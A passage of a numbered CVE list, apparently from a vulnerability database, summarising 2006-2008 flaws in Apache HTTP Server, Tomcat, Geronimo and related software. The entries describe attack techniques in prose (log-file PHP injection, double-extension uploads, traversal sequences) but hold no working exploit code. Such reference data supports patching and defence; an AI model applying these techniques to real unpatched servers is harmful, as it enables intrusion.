3240| [CVE-2008-2938] Directory traversal vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when allowLinking and UTF-8 are enabled, allows remote attackers to read arbitrary files via encoded directory traversal sequences in the URI, a different vulnerability than CVE-2008-2370. NOTE: versions earlier than 6.0.18 were reported affected, but the vendor advisory lists 6.0.16 as the last affected version.
3241| [CVE-2008-2742] Unrestricted file upload in the mcpuk file editor (atk/attributes/fck/editor/filemanager/browser/mcpuk/connectors/php/config.php) in Achievo 1.2.0 through 1.3.2 allows remote attackers to execute arbitrary code by uploading a file with .php followed by a safe extension, then accessing it via a direct request to the file in the Achievo root directory. NOTE: this is only a vulnerability in environments that support multiple extensions, such as Apache with the mod_mime module enabled.
3242| [CVE-2008-2717] TYPO3 4.0.x before 4.0.9, 4.1.x before 4.1.7, and 4.2.x before 4.2.1, uses an insufficiently restrictive default fileDenyPattern for Apache, which allows remote attackers bypass security restrictions and upload configuration files such as .htaccess, or conduct file upload attacks using multiple extensions.
3243| [CVE-2008-2579] Unspecified vulnerability in the WebLogic Server Plugins for Apache, Sun and IIS web servers component in Oracle BEA Product Suite 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7, and 6.1 SP7 has unknown impact and remote attack vectors.
3244| [CVE-2008-2384] SQL injection vulnerability in mod_auth_mysql.c in the mod-auth-mysql (aka libapache2-mod-auth-mysql) module for the Apache HTTP Server 2.x, when configured to use a multibyte character set that allows a \ (backslash) as part of the character encoding, allows remote attackers to execute arbitrary SQL commands via unspecified inputs in a login request.
3245| [CVE-2008-2370] Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when a RequestDispatcher is used, performs path normalization before removing the query string from the URI, which allows remote attackers to conduct directory traversal attacks and read arbitrary files via a .. (dot dot) in a request parameter.
3246| [CVE-2008-2364] The ap_proxy_http_process_response function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server 2.0.63 and 2.2.8 does not limit the number of forwarded interim responses, which allows remote HTTP servers to cause a denial of service (memory consumption) via a large number of interim responses.
3247| [CVE-2008-2168] Cross-site scripting (XSS) vulnerability in Apache 2.2.6 and earlier allows remote attackers to inject arbitrary web script or HTML via UTF-7 encoded URLs that are not properly handled when displaying the 403 Forbidden error page.
3248| [CVE-2008-2025] Cross-site scripting (XSS) vulnerability in Apache Struts before 1.2.9-162.31.1 on SUSE Linux Enterprise (SLE) 11, before 1.2.9-108.2 on SUSE openSUSE 10.3, before 1.2.9-198.2 on SUSE openSUSE 11.0, and before 1.2.9-162.163.2 on SUSE openSUSE 11.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to "insufficient quoting of parameters."
3249| [CVE-2008-1947] Cross-site scripting (XSS) vulnerability in Apache Tomcat 5.5.9 through 5.5.26 and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via the name parameter (aka the hostname attribute) to host-manager/html/add.
3250| [CVE-2008-1734] Interpretation conflict in PHP Toolkit before 1.0.1 on Gentoo Linux might allow local users to cause a denial of service (PHP outage) and read contents of PHP scripts by creating a file with a one-letter lowercase alphabetic name, which triggers interpretation of a certain unquoted [a-z] argument as a matching shell glob for this name, rather than interpretation as the literal [a-z] regular-expression string, and consequently blocks the launch of the PHP interpreter within the Apache HTTP Server.
3251| [CVE-2008-1678] Memory leak in the zlib_stateful_init function in crypto/comp/c_zlib.c in libssl in OpenSSL 0.9.8f through 0.9.8h allows remote attackers to cause a denial of service (memory consumption) via multiple calls, as demonstrated by initial SSL client handshakes to the Apache HTTP Server mod_ssl that specify a compression algorithm.
3252| [CVE-2008-1232] Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via a crafted string that is used in the message argument to the HttpServletResponse.sendError method.
3253| [CVE-2008-0869] Cross-site scripting (XSS) vulnerability in BEA WebLogic Workshop 8.1 through SP6 and Workshop for WebLogic 9.0 through 10.0 allows remote attackers to inject arbitrary web script or HTML via a "framework defined request parameter" when using WebLogic Workshop or Apache Beehive NetUI framework with page flows.
3254| [CVE-2008-0732] The init script for Apache Geronimo on SUSE Linux follows symlinks when performing a chown operation, which might allow local users to obtain access to unspecified files or directories.
3255| [CVE-2008-0555] The ExpandCert function in Apache-SSL before apache_1.3.41+ssl_1.59 does not properly handle (1) '/' and (2) '=' characters in a Distinguished Name (DN) in a client certificate, which might allow remote attackers to bypass authentication via a crafted DN that triggers overwriting of environment variables.
3256| [CVE-2008-0457] Unrestricted file upload vulnerability in the FileUpload class running on the Symantec LiveState Apache Tomcat server, as used by Symantec Backup Exec System Recovery Manager 7.0 and 7.0.1, allows remote attackers to upload and execute arbitrary JSP files via unknown vectors.
3257| [CVE-2008-0456] CRLF injection vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary HTTP headers and conduct HTTP response splitting attacks by uploading a file with a multi-line name containing HTTP header sequences and a file extension, which leads to injection within a (1) "406 Not Acceptable" or (2) "300 Multiple Choices" HTTP response when the extension is omitted in a request for the file.
3258| [CVE-2008-0455] Cross-site scripting (XSS) vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary web script or HTML by uploading a file with a name containing XSS sequences and a file extension, which leads to injection within a (1) "406 Not Acceptable" or (2) "300 Multiple Choices" HTTP response when the extension is omitted in a request for the file.
3259| [CVE-2008-0128] The SingleSignOn Valve (org.apache.catalina.authenticator.SingleSignOn) in Apache Tomcat before 5.5.21 does not set the secure flag for the JSESSIONIDSSO cookie in an https session, which can cause the cookie to be sent in http requests and make it easier for remote attackers to capture this cookie.
3260| [CVE-2008-0005] mod_proxy_ftp in Apache 2.2.x before 2.2.7-dev, 2.0.x before 2.0.62-dev, and 1.3.x before 1.3.40-dev does not define a charset, which allows remote attackers to conduct cross-site scripting (XSS) attacks using UTF-7 encoding.
3261| [CVE-2008-0002] Apache Tomcat 6.0.0 through 6.0.15 processes parameters in the context of the wrong request when an exception occurs during parameter processing, which might allow remote attackers to obtain sensitive information, as demonstrated by disconnecting during this processing in order to trigger the exception.
3262| [CVE-2007-6750] The Apache HTTP Server 1.x and 2.x allows remote attackers to cause a denial of service (daemon outage) via partial HTTP requests, as demonstrated by Slowloris, related to the lack of the mod_reqtimeout module in versions before 2.2.15.
3263| [CVE-2007-6726] Multiple cross-site scripting (XSS) vulnerabilities in Dojo 0.4.1 and 0.4.2, as used in Apache Struts and other products, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors involving (1) xip_client.html and (2) xip_server.html in src/io/.
3264| [CVE-2007-6514] Apache HTTP Server, when running on Linux with a document root on a Windows share mounted using smbfs, allows remote attackers to obtain unprocessed content such as source files for .php programs via a trailing "\" (backslash), which is not handled by the intended AddType directive.
3265| [CVE-2007-6423] ** DISPUTED ** Unspecified vulnerability in mod_proxy_balancer for Apache HTTP Server 2.2.x before 2.2.7-dev, when running on Windows, allows remote attackers to trigger memory corruption via a long URL. NOTE: the vendor could not reproduce this issue.
3266| [CVE-2007-6422] The balancer_handler function in mod_proxy_balancer in the Apache HTTP Server 2.2.0 through 2.2.6, when a threaded Multi-Processing Module is used, allows remote authenticated users to cause a denial of service (child process crash) via an invalid bb variable.
3267| [CVE-2007-6421] Cross-site scripting (XSS) vulnerability in balancer-manager in mod_proxy_balancer in the Apache HTTP Server 2.2.0 through 2.2.6 allows remote attackers to inject arbitrary web script or HTML via the (1) ss, (2) wr, or (3) rr parameters, or (4) the URL.
3268| [CVE-2007-6420] Cross-site request forgery (CSRF) vulnerability in the balancer-manager in mod_proxy_balancer for Apache HTTP Server 2.2.x allows remote attackers to gain privileges via unspecified vectors.
3269| [CVE-2007-6388] Cross-site scripting (XSS) vulnerability in mod_status in the Apache HTTP Server 2.2.0 through 2.2.6, 2.0.35 through 2.0.61, and 1.3.2 through 1.3.39, when the server-status page is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
3270| [CVE-2007-6361] Gekko 0.8.2 and earlier stores sensitive information under the web root with possibly insufficient access control, which might allow remote attackers to read certain files under temp/, as demonstrated by a log file that records the titles of blog entries. NOTE: access to temp/ is blocked by .htaccess in most deployments that use Apache HTTP Server.
3271| [CVE-2007-6342] SQL injection vulnerability in the David Castro AuthCAS module (AuthCAS.pm) 0.4 for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the SESSION_COOKIE_NAME (session ID) in a cookie.
3272| [CVE-2007-6286] Apache Tomcat 5.5.11 through 5.5.25 and 6.0.0 through 6.0.15, when the native APR connector is used, does not properly handle an empty request to the SSL port, which allows remote attackers to trigger handling of "a duplicate copy of one of the recent requests," as demonstrated by using netcat to send the empty request.
3273| [CVE-2007-6258] Multiple stack-based buffer overflows in the legacy mod_jk2 2.0.3-DEV and earlier Apache module allow remote attackers to execute arbitrary code via a long (1) Host header, or (2) Hostname within a Host header.
3274| [CVE-2007-6231] Multiple PHP remote file inclusion vulnerabilities in tellmatic 1.0.7 allow remote attackers to execute arbitrary PHP code via a URL in the tm_includepath parameter to (1) Classes.inc.php, (2) statistic.inc.php, (3) status.inc.php, (4) status_top_x.inc.php, or (5) libchart-1.1/libchart.php in include/. NOTE: access to include/ is blocked by .htaccess in most deployments that use Apache HTTP Server.
3275| [CVE-2007-6203] Apache HTTP Server 2.0.x and 2.2.x does not sanitize the HTTP Method specifier header from an HTTP request when it is reflected back in a "413 Request Entity Too Large" error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated via an HTTP request containing an invalid Content-length value, a similar issue to CVE-2006-3918.
3276| [CVE-2007-5797] SQLLoginModule in Apache Geronimo 2.0 through 2.1 does not throw an exception for a nonexistent username, which allows remote attackers to bypass authentication via a login attempt with any username not contained in the database.
3277| [CVE-2007-5731] Absolute path traversal vulnerability in Apache Jakarta Slide 2.1 and earlier allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag, a related issue to CVE-2007-5461.
3278| [CVE-2007-5461] Absolute path traversal vulnerability in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0, 5.0.0, 5.5.0 through 5.5.25, and 6.0.0 through 6.0.14, under certain configurations, allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag.
3279| [CVE-2007-5342] The default catalina.policy in the JULI logging component in Apache Tomcat 5.5.9 through 5.5.25 and 6.0.0 through 6.0.15 does not restrict certain permissions for web applications, which allows attackers to modify logging configuration options and overwrite arbitrary files, as demonstrated by changing the (1) level, (2) directory, and (3) prefix attributes in the org.apache.juli.FileHandler handler.
3280| [CVE-2007-5333] Apache Tomcat 6.0.0 through 6.0.14, 5.5.0 through 5.5.25, and 4.1.0 through 4.1.36 does not properly handle (1) double quote (") characters or (2) %5C (encoded backslash) sequences in a cookie value, which might cause sensitive information such as session IDs to be leaked to remote attackers and enable session hijacking attacks. NOTE: this issue exists because of an incomplete fix for CVE-2007-3385.
3281| [CVE-2007-5156] Incomplete blacklist vulnerability in editor/filemanager/upload/php/upload.php in FCKeditor, as used in SiteX CMS 0.7.3.beta, La-Nai CMS, Syntax CMS, Cardinal Cms, and probably other products, allows remote attackers to upload and execute arbitrary PHP code via a file whose name contains ".php." and has an unknown extension, which is recognized as a .php file by the Apache HTTP server, a different vulnerability than CVE-2006-0658 and CVE-2006-2529.
3282| [CVE-2007-5085] Unspecified vulnerability in the management EJB (MEJB) in Apache Geronimo before 2.0.2 allows remote attackers to bypass authentication and obtain "access to Geronimo internals" via unspecified vectors.
3283| [CVE-2007-5000] Cross-site scripting (XSS) vulnerability in the (1) mod_imap module in the Apache HTTP Server 1.3.0 through 1.3.39 and 2.0.35 through 2.0.61 and the (2) mod_imagemap module in the Apache HTTP Server 2.2.0 through 2.2.6 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
3284| [CVE-2007-4724] Cross-site request forgery (CSRF) vulnerability in cal2.jsp in the calendar examples application in Apache Tomcat 4.1.31 allows remote attackers to add events as arbitrary users via the time and description parameters.
3285| [CVE-2007-4723] Directory traversal vulnerability in Ragnarok Online Control Panel 4.3.4a, when the Apache HTTP Server is used, allows remote attackers to bypass authentication via directory traversal sequences in a URI that ends with the name of a publicly available page, as demonstrated by a "/...../" sequence and an account_manage.php/login.php final component for reaching the protected account_manage.php page.
3286| [CVE-2007-4641] Directory traversal vulnerability in index.php in Pakupaku CMS 0.4 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter, as demonstrated by injecting code into an Apache log file.
3287| [CVE-2007-4556] Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via form input beginning with a "%{" sequence and ending with a "}" character.
3288| [CVE-2007-4548] The login method in LoginModule implementations in Apache Geronimo 2.0 does not throw FailedLoginException for failed logins, which allows remote attackers to bypass authentication requirements, deploy arbitrary modules, and gain administrative access by sending a blank username and password with the command line deployer in the deployment module.
3289| [CVE-2007-4465] Cross-site scripting (XSS) vulnerability in mod_autoindex.c in the Apache HTTP Server before 2.2.6, when the charset on a server-generated page is not defined, allows remote attackers to inject arbitrary web script or HTML via the P parameter using the UTF-7 charset. NOTE: it could be argued that this issue is due to a design limitation of browsers that attempt to perform automatic content type detection.
3290| [CVE-2007-3847] The date handling code in modules/proxy/proxy_util.c (mod_proxy) in Apache 2.3.0, when using a threaded MPM, allows remote origin servers to cause a denial of service (caching forward proxy process crash) via crafted date headers that trigger a buffer over-read.
3291| [CVE-2007-3571] The Apache Web Server as used in Novell NetWare 6.5 and GroupWise allows remote attackers to obtain sensitive information via a certain directive to Apache that causes the HTTP-Header response to be modified, which may reveal the server's internal IP address.
3292| [CVE-2007-3386] Cross-site scripting (XSS) vulnerability in the Host Manager Servlet for Apache Tomcat 6.0.0 to 6.0.13 and 5.5.0 to 5.5.24 allows remote attackers to inject arbitrary HTML and web script via crafted requests, as demonstrated using the aliases parameter to an html/add action.
3293| [CVE-2007-3385] Apache Tomcat 6.0.0 to 6.0.13, 5.5.0 to 5.5.24, 5.0.0 to 5.0.30, 4.1.0 to 4.1.36, and 3.3 to 3.3.2 does not properly handle the \" character sequence in a cookie value, which might cause sensitive information such as session IDs to be leaked to remote attackers and enable session hijacking attacks.
3294| [CVE-2007-3384] Multiple cross-site scripting (XSS) vulnerabilities in examples/servlet/CookieExample in Apache Tomcat 3.3 through 3.3.2 allow remote attackers to inject arbitrary web script or HTML via the (1) Name or (2) Value field, related to error messages.
3295| [CVE-2007-3383] Cross-site scripting (XSS) vulnerability in SendMailServlet in the examples web application (examples/jsp/mail/sendmail.jsp) in Apache Tomcat 4.0.0 through 4.0.6 and 4.1.0 through 4.1.36 allows remote attackers to inject arbitrary web script or HTML via the From field and possibly other fields, related to generation of error messages.
3296| [CVE-2007-3382] Apache Tomcat 6.0.0 to 6.0.13, 5.5.0 to 5.5.24, 5.0.0 to 5.0.30, 4.1.0 to 4.1.36, and 3.3 to 3.3.2 treats single quotes ("'") as delimiters in cookies, which might cause sensitive information such as session IDs to be leaked and allow remote attackers to conduct session hijacking attacks.
3297| [CVE-2007-3304] Apache httpd 1.3.37, 2.0.59, and 2.2.4 with the Prefork MPM module, allows local users to cause a denial of service by modifying the worker_score and process_score arrays to reference an arbitrary process ID, which is sent a SIGUSR1 signal from the master process, aka "SIGUSR1 killer."
3298| [CVE-2007-3303] Apache httpd 2.0.59 and 2.2.4, with the Prefork MPM module, allows local users to cause a denial of service via certain code sequences executed in a worker process that (1) stop request processing by killing all worker processes and preventing creation of replacements or (2) hang the system by forcing the master process to fork an arbitrarily large number of worker processes. NOTE: This might be an inherent design limitation of Apache with respect to worker processes in hosted environments.
3299| [CVE-2007-3101] Multiple cross-site scripting (XSS) vulnerabilities in certain JSF applications in Apache MyFaces Tomahawk before 1.1.6 allow remote attackers to inject arbitrary web script via the autoscroll parameter, which is injected into Javascript that is sent to the client.
3300| [CVE-2007-2450] Multiple cross-site scripting (XSS) vulnerabilities in the (1) Manager and (2) Host Manager web applications in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote authenticated users to inject arbitrary web script or HTML via a parameter name to manager/html/upload, and other unspecified vectors.
3301| [CVE-2007-2449] Multiple cross-site scripting (XSS) vulnerabilities in certain JSP files in the examples web application in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote attackers to inject arbitrary web script or HTML via the portion of the URI after the '
3302| [CVE-2007-2353] Apache Axis 1.0 allows remote attackers to obtain sensitive information by requesting a non-existent WSDL file, which reveals the installation path in the resulting exception message.
3303| [CVE-2007-2025] Unrestricted file upload vulnerability in the UpLoad feature (lib/plugin/UpLoad.php) in PhpWiki 1.3.11p1 allows remote attackers to upload arbitrary PHP files with a double extension, as demonstrated by .php.3, which is interpreted by Apache as being a valid PHP file.
3304| [CVE-2007-1863] cache_util.c in the mod_cache module in Apache HTTP Server (httpd), when caching is enabled and a threaded Multi-Processing Module (MPM) is used, allows remote attackers to cause a denial of service (child processing handler crash) via a request with the (1) s-maxage, (2) max-age, (3) min-fresh, or (4) max-stale Cache-Control headers without a value.
3305| [CVE-2007-1862] The recall_headers function in mod_mem_cache in Apache 2.2.4 does not properly copy all levels of header data, which can cause Apache to return HTTP headers containing previously used data, which could be used by remote attackers to obtain potentially sensitive information.
3306| [CVE-2007-1860] mod_jk in Apache Tomcat JK Web Server Connector 1.2.x before 1.2.23 decodes request URLs within the Apache HTTP Server before passing the URL to Tomcat, which allows remote attackers to access protected pages via a crafted prefix JkMount, possibly involving double-encoded .. (dot dot) sequences and directory traversal, a related issue to CVE-2007-0450.
3307| [CVE-2007-1858] The default SSL cipher configuration in Apache Tomcat 4.1.28 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.17 uses certain insecure ciphers, including the anonymous cipher, which allows remote attackers to obtain sensitive information or have other, unspecified impacts.
3308| [CVE-2007-1842] Directory traversal vulnerability in login.php in JSBoard before 2.0.12 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the table parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, a related issue to CVE-2006-2019.
3309| [CVE-2007-1801] Directory traversal vulnerability in inc/lang.php in sBLOG 0.7.3 Beta allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the conf_lang_default parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by inc/lang.php.
3310| [CVE-2007-1743] suexec in Apache HTTP Server (httpd) 2.2.3 does not verify combinations of user and group IDs on the command line, which might allow local users to leverage other vulnerabilities to create arbitrary UID/GID owned files if /proc is mounted. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root." In addition, because this is dependent on other vulnerabilities, perhaps this is resultant and should not be included in CVE.
3311| [CVE-2007-1742] suexec in Apache HTTP Server (httpd) 2.2.3 uses a partial comparison for verifying whether the current directory is within the document root, which might allow local users to perform unauthorized operations on incorrect directories, as demonstrated using "html_backup" and "htmleditor" under an "html" directory. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root."
3312| [CVE-2007-1741] Multiple race conditions in suexec in Apache HTTP Server (httpd) 2.2.3 between directory and file validation, and their usage, allow local users to gain privileges and execute arbitrary code by renaming directories or performing symlink attacks. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root."
3313| [CVE-2007-1720] Directory traversal vulnerability in addressbook.php in the Addressbook 1.2 module for PHP-Nuke allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the module_name parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file.
3314| [CVE-2007-1636] Directory traversal vulnerability in index.php in RoseOnlineCMS 3 B1 allows remote attackers to include arbitrary files via a .. (dot dot) sequence in the op parameter, as demonstrated by injecting PHP code into Apache log files via the URL and User-Agent HTTP header.
3315| [CVE-2007-1633] Directory traversal vulnerability in bbcode_ref.php in the Giorgio Ciranni Splatt Forum 4.0 RC1 module for PHP-Nuke allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the name parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by bbcode_ref.php.
3316| [CVE-2007-1577] Directory traversal vulnerability in index.php in GeBlog 0.1 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the GLOBALS[tplname] parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
3317| [CVE-2007-1539] Directory traversal vulnerability in inc/map.func.php in pragmaMX Landkarten 2.1 module allows remote attackers to include arbitrary files via a .. (dot dot) sequence in the module_name parameter, as demonstrated via a static PHP code injection attack in an Apache log file.
3318| [CVE-2007-1524] Directory traversal vulnerability in themes/default/ in ZomPlog 3.7.6 and earlier allows remote attackers to include arbitrary local files via a .. (dot dot) in the settings[skin] parameter, as demonstrated by injecting PHP code into an Apache HTTP Server log file, which can then be included via themes/default/.
3319| [CVE-2007-1491] Apache Tomcat in Avaya S87XX, S8500, and S8300 before CM 3.1.3, and Avaya SES allows connections from external interfaces via port 8009, which exposes it to attacks from outside parties.
3320| [CVE-2007-1358] Cross-site scripting (XSS) vulnerability in certain applications using Apache Tomcat 4.0.0 through 4.0.6 and 4.1.0 through 4.1.34 allows remote attackers to inject arbitrary web script or HTML via crafted "Accept-Language headers that do not conform to RFC 2616".
3321| [CVE-2007-1349] PerlRun.pm in Apache mod_perl before 1.30, and RegistryCooker.pm in mod_perl 2.x, does not properly escape PATH_INFO before use in a regular expression, which allows remote attackers to cause a denial of service (resource consumption) via a crafted URI.
3322| [CVE-2007-0975] Variable extraction vulnerability in Ian Bezanson Apache Stats before 0.0.3 beta allows attackers to overwrite critical variables, with unknown impact, when the extract function is used on the _REQUEST superglobal array.
3323| [CVE-2007-0930] Variable extract vulnerability in Apache Stats before 0.0.3beta allows attackers to modify arbitrary variables and conduct attacks via unknown vectors involving the use of PHP's extract function.
3324| [CVE-2007-0792] The mod_perl initialization script in Bugzilla 2.23.3 does not set the Bugzilla Apache configuration to allow .htaccess permissions to override file permissions, which allows remote attackers to obtain the database username and password via a direct request for the localconfig file.
3325| [CVE-2007-0774] Stack-based buffer overflow in the map_uri_to_worker function (native/common/jk_uri_worker_map.c) in mod_jk.so for Apache Tomcat JK Web Server Connector 1.2.19 and 1.2.20, as used in Tomcat 4.1.34 and 5.5.20, allows remote attackers to execute arbitrary code via a long URL that triggers the overflow in a URI worker map routine.
3326| [CVE-2007-0637] Directory traversal vulnerability in zd_numer.php in Galeria Zdjec 3.0 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the galeria parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by zd_numer.php.
3327| [CVE-2007-0451] Apache SpamAssassin before 3.1.8 allows remote attackers to cause a denial of service via long URLs in malformed HTML, which triggers "massive memory usage."
3328| [CVE-2007-0450] Directory traversal vulnerability in Apache HTTP Server and Tomcat 5.x before 5.5.22 and 6.x before 6.0.10, when using certain proxy modules (mod_proxy, mod_rewrite, mod_jk), allows remote attackers to read arbitrary files via a .. (dot dot) sequence with combinations of (1) "/" (slash), (2) "\" (backslash), and (3) URL-encoded backslash (%5C) characters in the URL, which are valid separators in Tomcat but not in Apache.
3329| [CVE-2007-0419] The BEA WebLogic Server proxy plug-in before June 2006 for the Apache HTTP Server does not properly handle protocol errors, which allows remote attackers to cause a denial of service (server outage).
3330| [CVE-2007-0173] Directory traversal vulnerability in index.php in L2J Statistik Script 0.09 and earlier, when register_globals is enabled and magic_quotes is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
3331| [CVE-2007-0098] Directory traversal vulnerability in language.php in VerliAdmin 0.3 and earlier, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by language.php.
3332| [CVE-2007-0086] ** DISPUTED ** The Apache HTTP Server, when accessed through a TCP connection with a large window size, allows remote attackers to cause a denial of service (network bandwidth consumption) via a Range header that specifies multiple copies of the same fragment. NOTE: the severity of this issue has been disputed by third parties, who state that the large window size required by the attack is not normally supported or configured by the server, or that a DDoS-style attack would accomplish the same goal.
3333| [CVE-2006-7217] Apache Derby before 10.2.1.6 does not determine schema privilege requirements during the DropSchemaNode bind phase, which allows remote authenticated users to execute arbitrary drop schema statements in SQL authorization mode.
3334| [CVE-2006-7216] Apache Derby before 10.2.1.6 does not determine privilege requirements for lock table statements at compilation time, and consequently does not enforce privilege requirements at execution time, which allows remote authenticated users to lock arbitrary tables.
3335| [CVE-2006-7197] The AJP connector in Apache Tomcat 5.5.15 uses an incorrect length for chunks, which can cause a buffer over-read in the ajp_process_callback in mod_jk, which allows remote attackers to read portions of sensitive memory.
3336| [CVE-2006-7196] Cross-site scripting (XSS) vulnerability in the calendar application example in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.15 allows remote attackers to inject arbitrary web script or HTML via the time parameter to cal2.jsp and possibly unspecified other vectors. NOTE: this may be related to CVE-2006-0254.1.
3337| [CVE-2006-7195] Cross-site scripting (XSS) vulnerability in implicit-objects.jsp in Apache Tomcat 5.0.0 through 5.0.30 and 5.5.0 through 5.5.17 allows remote attackers to inject arbitrary web script or HTML via certain header values.
3338| [CVE-2006-7098] The Debian GNU/Linux 033_-F_NO_SETSID patch for the Apache HTTP Server 1.3.34-4 does not properly disassociate httpd from a controlling tty when httpd is started interactively, which allows local users to gain privileges to that tty via a CGI program that calls the TIOCSTI ioctl.
3339| [CVE-2006-6869] Directory traversal vulnerability in includes/search/search_mdforum.php in MAXdev MDForum 2.0.1 and earlier, when magic_quotes_gpc is disabled and register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang cookie to error.php, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
3340| [CVE-2006-6675] Cross-site scripting (XSS) vulnerability in Novell NetWare 6.5 Support Pack 5 and 6 and Novell Apache on NetWare 2.0.48 allows remote attackers to inject arbitrary web script or HTML via unspecifeid parameters in Welcome web-app.
3341| [CVE-2006-6613] Directory traversal vulnerability in language.php in phpAlbum 0.4.1 Beta 6 and earlier, when magic_quotes_gpc is disabled and register_globals is enabled, allows remote attackers to include and execute arbitrary local files or obtain sensitive information via a .. (dot dot) in the pa_lang[include_file] parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by language.php.
3342| [CVE-2006-6589] Cross-site scripting (XSS) vulnerability in ecommerce/control/keywordsearch in the Apache Open For Business Project (OFBiz) and Opentaps 0.9.3 allows remote attackers to inject arbitrary web script or HTML via the SEARCH_STRING parameter, a different issue than CVE-2006-6587. NOTE: some of these details are obtained from third party information.
3343| [CVE-2006-6588] The forum implementation in the ecommerce component in the Apache Open For Business Project (OFBiz) trusts the (1) dataResourceTypeId, (2) contentTypeId, and certain other hidden form fields, which allows remote attackers to create unauthorized types of content, modify content, or have other unknown impact.
3344| [CVE-2006-6587] Cross-site scripting (XSS) vulnerability in the forum implementation in the ecommerce component in the Apache Open For Business Project (OFBiz) allows remote attackers to inject arbitrary web script or HTML by posting a message.
3345| [CVE-2006-6445] Directory traversal vulnerability in error.php in Envolution 1.1.0 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang (PNSV lang) parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
3346| [CVE-2006-6071] TWiki 4.0.5 and earlier, when running under Apache 1.3 using ApacheLogin with sessions and "ErrorDocument 401" redirects to a valid wiki topic, does not properly handle failed login attempts, which allows remote attackers to read arbitrary content by cancelling out of a failed authentication with a valid username and invalid password.
3347| [CVE-2006-6047] Directory traversal vulnerability in manager/index.php in Etomite 0.6.1.2 allows remote authenticated administrators to include and execute arbitrary local files via a .. (dot dot) in the f parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
3348| [CVE-2006-5894] Directory traversal vulnerability in lang.php in Rama CMS 0.68 and earlier, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by lang.php.
3349| [CVE-2006-5752] Cross-site scripting (XSS) vulnerability in mod_status.c in the mod_status module in Apache HTTP Server (httpd), when ExtendedStatus is enabled and a public server-status page is used, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving charsets with browsers that perform "charset detection" when the content-type is not specified.
3350| [CVE-2006-5733] Directory traversal vulnerability in error.php in PostNuke 0.763 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang (PNSV lang) cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
